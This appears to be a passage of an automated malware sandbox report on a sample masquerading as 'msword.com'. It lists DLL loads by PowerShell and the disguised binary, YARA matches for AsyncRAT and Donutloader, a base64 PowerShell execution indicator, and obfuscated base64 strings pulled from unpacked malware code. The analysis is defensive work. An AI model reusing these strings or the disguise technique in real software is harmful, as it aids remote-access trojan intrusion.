Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comSection loaded: msvfw32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 30.2.msword.exe.17fd2fbcdd8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 17.2.msword.com.217627b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 30.2.msword.exe.17fd2eb0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 17.2.msword.com.217627b0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 30.2.msword.exe.cf0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 17.2.msword.com.e70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000011.00000002.2872815361.0000021760F20000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000011.00000002.2866379381.0000000000F49000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001E.00000002.2870615547.0000017FABC00000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001E.00000002.2872402033.0000017FD2FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001E.00000002.2872006726.0000017FD2EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001E.00000002.2866315495.0000000000DC9000.00000004.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000011.00000002.2873533097.00000217627B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 7384, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 17.2.msword.com.217627b0000.1.raw.unpack, 5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.csCryptographic APIs: 'TransformFinalBlock'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, 5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.csCryptographic APIs: 'TransformFinalBlock'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, uZTleKS4UURYcsq7mO9baxmplLW1iTvON57H4pxXBvSyFchTtcNVpsJ0sd.csCryptographic APIs: 'TransformFinalBlock'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, 5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.csCryptographic APIs: 'TransformFinalBlock'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, 5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.csCryptographic APIs: 'TransformFinalBlock'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, uZTleKS4UURYcsq7mO9baxmplLW1iTvON57H4pxXBvSyFchTtcNVpsJ0sd.csCryptographic APIs: 'TransformFinalBlock'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, 5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.csCryptographic APIs: 'TransformFinalBlock'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, 5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.csCryptographic APIs: 'TransformFinalBlock'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, uZTleKS4UURYcsq7mO9baxmplLW1iTvON57H4pxXBvSyFchTtcNVpsJ0sd.csCryptographic APIs: 'TransformFinalBlock'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, ccoRm1aX6Iq4Sq9OBFja99KcLljS51CkIsEIoNl675ZIbvsdrUYen9NpS5cSkZj.csBase64 encoded string: 'iLcGHBHTBup3oTBleqqagMtDXAspQPvG7xpKu43Chq6dKs2Aq40rtfERtX5XOTV1aVFu4EYd5m73'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csBase64 encoded string: 'lOy8McEMHBV6Am4nzxG25H8oIDvRHHVzhIjGEuW1rBVKyImB3t0YjBUeu38N82n6qrfJ', 'LLIWW1zdHIRlRK5ZnXnZTjqSm7zAxCVyHTBsyvTq5yARF8VSDmpOLyI8lOIKnip5hR77', 'sRlDmzo9ChwYam154Lky86hNOMogjCASxgE6x8aJTzApHmWmxLXEXYdSUXy7S6Kr674z', 'pw8am4Xzrd3YHzJGskR5NSiQqPW8UTU6NvPJhlaWlCCb8vmklw4rcxulQxupoVvmGHts', 'VSPPRqzOzmBqdc7UPRTotoDpWKGfJxRFyjJ9oZ88ABms07mNKL4xH818U1VKPf7AyaoB', 'Xhm0bS3Fa09L6OIqLOk5wwcvGTjD61vxwDJm9xdpneVGj9f7aees3UTRd7UVkEMcpW0C', 'YFeJtRTVP40ibRWxu3MAMfmU2oys3m2kwutzPCQMj5xgy6V5GhJ6ivtCmstUt4RMQxsx'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.csBase64 encoded string: 'QpP1iOqD4Mk1Ae4wKbuPlhTy98PYpVJ8pfMige9qGxk17h3ZXnxYwllGPcs8fBdhkHuR', 'IefPsHFDPqac8COzAalVTBetyiEdNi3X9JmzkjuNuZ31DBpefI27Pq9t1n6gSGv9sjVr', 'KdBZpkgMeykZQg75JLdgJ3Q56nTKrZUVkahS3N08FYrDLTSKhp7SptRWIXJH3ZxEKuA7', 'rkWrqL0EUSR1XArjS07wBh2Nkt3j70GkFiDwApmeIiXAVLGK4I5zs0p8teL3HkCHOLTc'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, ccoRm1aX6Iq4Sq9OBFja99KcLljS51CkIsEIoNl675ZIbvsdrUYen9NpS5cSkZj.csBase64 encoded string: 'iLcGHBHTBup3oTBleqqagMtDXAspQPvG7xpKu43Chq6dKs2Aq40rtfERtX5XOTV1aVFu4EYd5m73'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csBase64 encoded string: 'lOy8McEMHBV6Am4nzxG25H8oIDvRHHVzhIjGEuW1rBVKyImB3t0YjBUeu38N82n6qrfJ', 'LLIWW1zdHIRlRK5ZnXnZTjqSm7zAxCVyHTBsyvTq5yARF8VSDmpOLyI8lOIKnip5hR77', 'sRlDmzo9ChwYam154Lky86hNOMogjCASxgE6x8aJTzApHmWmxLXEXYdSUXy7S6Kr674z', 'pw8am4Xzrd3YHzJGskR5NSiQqPW8UTU6NvPJhlaWlCCb8vmklw4rcxulQxupoVvmGHts', 'VSPPRqzOzmBqdc7UPRTotoDpWKGfJxRFyjJ9oZ88ABms07mNKL4xH818U1VKPf7AyaoB', 'Xhm0bS3Fa09L6OIqLOk5wwcvGTjD61vxwDJm9xdpneVGj9f7aees3UTRd7UVkEMcpW0C', 'YFeJtRTVP40ibRWxu3MAMfmU2oys3m2kwutzPCQMj5xgy6V5GhJ6ivtCmstUt4RMQxsx'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.csBase64 encoded string: 'QpP1iOqD4Mk1Ae4wKbuPlhTy98PYpVJ8pfMige9qGxk17h3ZXnxYwllGPcs8fBdhkHuR', 'IefPsHFDPqac8COzAalVTBetyiEdNi3X9JmzkjuNuZ31DBpefI27Pq9t1n6gSGv9sjVr', 'KdBZpkgMeykZQg75JLdgJ3Q56nTKrZUVkahS3N08FYrDLTSKhp7SptRWIXJH3ZxEKuA7', 'rkWrqL0EUSR1XArjS07wBh2Nkt3j70GkFiDwApmeIiXAVLGK4I5zs0p8teL3HkCHOLTc'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, ccoRm1aX6Iq4Sq9OBFja99KcLljS51CkIsEIoNl675ZIbvsdrUYen9NpS5cSkZj.csBase64 encoded string: 'iLcGHBHTBup3oTBleqqagMtDXAspQPvG7xpKu43Chq6dKs2Aq40rtfERtX5XOTV1aVFu4EYd5m73'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csBase64 encoded string: 'lOy8McEMHBV6Am4nzxG25H8oIDvRHHVzhIjGEuW1rBVKyImB3t0YjBUeu38N82n6qrfJ', 'LLIWW1zdHIRlRK5ZnXnZTjqSm7zAxCVyHTBsyvTq5yARF8VSDmpOLyI8lOIKnip5hR77', 'sRlDmzo9ChwYam154Lky86hNOMogjCASxgE6x8aJTzApHmWmxLXEXYdSUXy7S6Kr674z', 'pw8am4Xzrd3YHzJGskR5NSiQqPW8UTU6NvPJhlaWlCCb8vmklw4rcxulQxupoVvmGHts', 'VSPPRqzOzmBqdc7UPRTotoDpWKGfJxRFyjJ9oZ88ABms07mNKL4xH818U1VKPf7AyaoB', 'Xhm0bS3Fa09L6OIqLOk5wwcvGTjD61vxwDJm9xdpneVGj9f7aees3UTRd7UVkEMcpW0C', 'YFeJtRTVP40ibRWxu3MAMfmU2oys3m2kwutzPCQMj5xgy6V5GhJ6ivtCmstUt4RMQxsx'
